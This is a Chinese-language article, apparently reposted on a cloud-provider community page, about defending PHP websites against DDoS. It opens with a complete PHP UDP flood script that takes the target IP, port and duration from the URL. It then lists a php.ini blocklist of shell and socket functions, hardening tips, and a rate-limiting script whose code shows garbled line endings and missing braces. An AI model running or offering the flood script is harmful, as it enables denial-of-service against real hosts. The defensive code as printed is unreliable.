PHP DDos的幾個防禦方法詳解

來源:互聯網
上載者:User

我們先來看php ddos代碼

 代碼如下 複製代碼

$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand
";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s n";
?>

細心的朋友會發現fsockopen是一個主要攻擊函數了,不斷串連發送請求導致機器流量與cpu過多從而網站不對正常訪問了。

於是簡單的研究了一下PHP DDos指令碼構造,並有所收穫,下面介紹幾點可以最大程度避免的方法:

注意:以下操作具有危險性,對於造成的任何後果,與傲遊無關,請謹慎操作。

1.開啟php.ini

2.禁用危險函數

由於程式不同,函數要求也不同,所以請客戶自行增刪需要禁用的函數。

找到disable_functions,將前面的“;”去掉,在等號後面增加:

 代碼如下 複製代碼

phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,
proc_get_status,fsocket,fsockopen

3.設定PHP執行逾時時間

如果程式未執行結束但已經達到最大執行時間,則會被強制停止,請根據需要調整時間。

找到max_execution_time,將前面的“;”去掉,在等號後面增加正整數,單位為秒,如:30

4.禁用上傳目錄PHP執行許可權

大概分為三種伺服器: IIS,Apache、Nginx,具體步驟就不寫了,放出個連結供大家參考:

iis與apache取消目錄指令碼執行許可權方法:http://www.111cn.net/sys/Windows/46232.htm

5.一個很暴力的方法

直接禁止PHP執行,原因是很多網站都可以產生靜態網頁的,每次產生或者管理都去手工開啟PHP執行許可權,現在已經有幾個使用者使用這種方法了,具體方法參見方法4

6.關閉使用者中心

比如dede等cms都會有使用者中心,裡面有很多上傳的地方,這就是大概的問題所在。

7.修改管理員目錄

這個方法就不細談了,並不是對所有程式都適合。

8.修改預設管理帳號

很多人都習慣使用:admin  但是如果程式出現漏洞,很容易被猜測出admin的密碼,所以建議修改admin為其他登入名稱。

9.一個複雜且記得住的密碼

不管是Windows/Linux的系統使用者還是網站管理員的賬戶,都需要設定一個難以猜解的密碼,如:123hai@tang@.

後再再附一個php防ddos攻擊的代碼

 代碼如下 複製代碼

<?php 
//查詢禁止IP 
$ip =$_SERVER['REMOTE_ADDR']; 
$fileht=".htaccess2"; 
if(!file_exists($fileht))file_put_contents($fileht,""); 
$filehtarr=@file($fileht); 
if(in_array($ip."rn",$filehtarr))die("Warning:"."<br>"."Your IP address are forbided by some reason, IF you have any question Pls emill to shop@mydalle.com!"); 

//加入禁止IP 
$time=time(); 
$fileforbid="log/forbidchk.dat"; 
if(file_exists($fileforbid)) 
{ if($time-filemtime($fileforbid)>60)unlink($fileforbid); 
else{ 
$fileforbidarr=@file($fileforbid); 
if($ip==substr($fileforbidarr[0],0,strlen($ip))) 

if($time-substr($fileforbidarr[1],0,strlen($time))>600)unlink($fileforbid); 
elseif($fileforbidarr[2]>600){file_put_contents($fileht,$ip."rn",FILE_APPEND);unlink($fileforbid);} 
else{$fileforbidarr[2]++;file_put_contents($fileforbid,$fileforbidarr);} 



//防重新整理 
$str=""; 
$file="log/ipdate.dat"; 
if(!file_exists("log")&&!is_dir("log"))mkdir("log",0777); 
if(!file_exists($file))file_put_contents($file,""); 
$allowTime = 120;//防重新整理時間 
$allowNum=10;//防重新整理次數 
$uri=$_SERVER['REQUEST_URI']; 
$checkip=md5($ip); 
$checkuri=md5($uri); 
$yesno=true; 
$ipdate=@file($file); 
foreach($ipdate as $k=>$v) 
{ $iptem=substr($v,0,32); 
$uritem=substr($v,32,32); 
$timetem=substr($v,64,10); 
$numtem=substr($v,74); 
if($time-$timetem<$allowTime){ 
if($iptem!=$checkip)$str.=$v; 
else{ 
$yesno=false; 
if($uritem!=$checkuri)$str.=$iptem.$checkuri.$time."1rn"; 
elseif($numtem<$allowNum)$str.=$iptem.$uritem.$timetem.($numtem+1)."rn"; 
else 

if(!file_exists($fileforbid)){$addforbidarr=array($ip."rn",time()."rn",1);file_put_contents($fileforbid,$addforbidarr);} 
file_put_contents("log/forbided_ip.log",$ip."--".date("Y-m-d H:i:s",time())."--".$uri."rn",FILE_APPEND); 
$timepass=$timetem+$allowTime-$time; 
die("Warning:"."<br>"."Sorry,you are forbided by refreshing frequently too much, Pls wait for ".$timepass." seconds to continue!"); 




if($yesno) $str.=$checkip.$checkuri.$time."1rn"; 
file_put_contents($file,$str); 
?>


相關教程 :

iis防止php ddos占完網路頻寬與伺服器資源解決方案

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.